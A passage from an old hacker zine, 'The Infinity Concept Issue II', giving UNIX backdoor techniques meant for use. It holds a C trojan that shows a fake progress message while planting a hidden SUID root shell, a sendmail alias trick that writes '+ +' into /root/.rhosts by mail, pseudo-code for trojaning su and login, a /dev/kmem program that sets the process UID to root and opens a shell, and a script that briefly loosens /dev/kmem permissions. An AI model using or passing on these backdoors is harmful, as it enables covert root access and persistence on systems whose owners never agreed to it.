Make sure it runs as root. Name it something innocous. Hide it well. /* A little trojan to create an SUID root shell, if the proper argument isgiven.  C code, rather than shell to hide obvious it's effects. *//* daemon9@netcom.com */#include#define KEYWORD "industry3"#define BUFFERSIZE 10   int main(argc, argv)int argc;char *argv[];{        int i=0;        if(argv[1]){            /* we've got an argument, is it the keyword? */                if(!(strcmp(KEYWORD,argv[1]))){                                                        /* This is the trojan part. */                        system("cp /bin/csh /bin/.swp121");                        system("chown root /bin/.swp121");                        system("chmod 4755 /bin/.swp121");                }        }                                /* Put your possibly system specific trojan                                   messages here */                                /* Let's look like we're doing something... */        printf("Sychronizing bitmap image records.");        /* system("ls -alR / >& /dev/null > /dev/null&"); */        for(;i<10;i++){                 fprintf(stderr,".");                            sleep(1);        }         printf("\nDone.\n");        return(0);} /* End main */[9] The sendmail aliases file. The sendmail aliases file allows for mail sent to a particular username to either expand to severalusers, or perhaps pipe the output to a program. Most well known of these is the uudecode alias trojan. Simply add the line:  "decode: "|/usr/bin/uudecode"to the /etc/aliases file. Usally, you would then create a uuencoded .rhosts file with the full pathname embedded. #! /bin/csh# Create our .rhosts file.  Note this will output to stdout.echo "+ +" > tmpfile/usr/bin/uuencode tmpfile /root/.rhostsNext telnet to the desired site, port 25. Simply fakemail to decode and use as the subject body, the uuencoded version of the.rhosts file. For a one liner (not faked, however) do this: %echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail decode@target.comYou can be as creative as you wish in this case. You can setup an alias that, when mailed to, will run a program of yourchoosing. Many of the previous scripts and methods can be employed here. The Covert[10] Trojan code in common programs. This is a rather sneaky method that is really only detectable by programs such tripwire.The idea is simple: insert trojan code in the source of a commonly used program. Some of most useful programs to us in thiscase are su, login and passwd because they already run SUID root, and need no permission modification. Below are somegeneral examples of what you would want to do, after obtaining the correct sourcecode for the particular flavor of UNIX youare backdooring. (Note: This may not always be possible, as some UNIX vendors are not so generous with thier sourcecode.)Since the code is very lengthy and different for many flavors, I will just include basic psuedo-code: get input;if input is special hardcoded flag, spawn evil trojan;else if input is valid, continue;else quit with error;...Not complex or difficult. Trojans of this nature can be done in less than 10 lines of additional code. The Esoteric[11] /dev/kmem exploit. It represents the virtual of the system. Since the kernel keeps it's parameters in memory, it is possibleto modify the memory of the machine to change the UID of your processes. To do so requires that /dev/kmem have read/writepermission. The following steps are executed: Open the /dev/kmem device, seek to your page in memory, overwrite the UID ofyour current process, then spawn a csh, which will inherit this UID. The following program does just that. /* If /kmem is is readable and writable, this program will change the user's UID and GID to 0.  *//* This code originally appeared in "UNIX security:  A practical tutorial" with some modifications by daemon9@netcom.com */#include #include #include #include #include #include #include #define KEYWORD "nomenclature1"struct user userpage;long address(), userlocation;int main(argc, argv, envp)int argc;char *argv[], *envp[];{        int count, fd;        long where, lseek();                if(argv[1]){            /* we've got an argument, is it the keyword? */                if(!(strcmp(KEYWORD,argv[1]))){                        fd=(open("/dev/kmem",O_RDWR);                        if(fd<0){                                printf("Cannot read or write to /dev/kmem\n");                                perror(argv);                                exit(10);                               }                                                        userlocation=address();                        where=(lseek(fd,userlocation,0);                                if(where!=userlocation){                                printf("Cannot seek to user page\n");                                perror(argv);                                exit(20);                         }                        count=read(fd,&userpage,sizeof(struct user));                                if(count!=sizeof(struct user)){                                printf("Cannot read user page\n");                                perror(argv);                                exit(30);                        }                               printf("Current UID: %d\n",userpage.u_ruid);                        printf("Current GID: %d\n",userpage.g_ruid);                                                userpage.u_ruid=0;                        userpage.u_rgid=0;                                                where=lseek(fd,userlocation,0);                        if(where!=userlocation){                                        printf("Cannot seek to user page\n");                                perror(argv);                                exit(40);                         }                                                write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage));                                                execle("/bin/csh","/bin/csh","-i",(char *)0, envp);                }        } } /* End main */#include #include #include #define LNULL ((LDFILE *)0)long address(){                LDFILE *object;        SYMENT symbol;        long idx=0;        object=ldopen("/unix",LNULL);        if(!object){                fprintf(stderr,"Cannot open /unix.\n");                exit(50);        }        for(;ldtbread(object,idx,&symbol)==SUCCESS;idx++){                if(!strcmp("_u",ldgetname(object,&symbol))){                        fprintf(stdout,"User page is at 0x%8.8x\n",symbol.n_value);                        ldclose(object);                        return(symbol.n_value);                }        }        fprintf(stderr,"Cannot read symbol table in /unix.\n");        exit(60);}[12] Since the previous code requires /dev/kmem to be world accessable, and this is not likely a natural event, we need to takecare of this. My advice is to write a shell script similar to the one in [7] that will change the permissions on /dev/kmem for adiscrete amount of time (say 5 minutes) and then restore the original permissions. You can add this source to the source in [7]: chmod 666 /dev/kmemsleep 300               # Nap for 5 minuteschmod 600 /dev/kmem     # Or whatever it was beforeFrom The Infinity Concept Issue II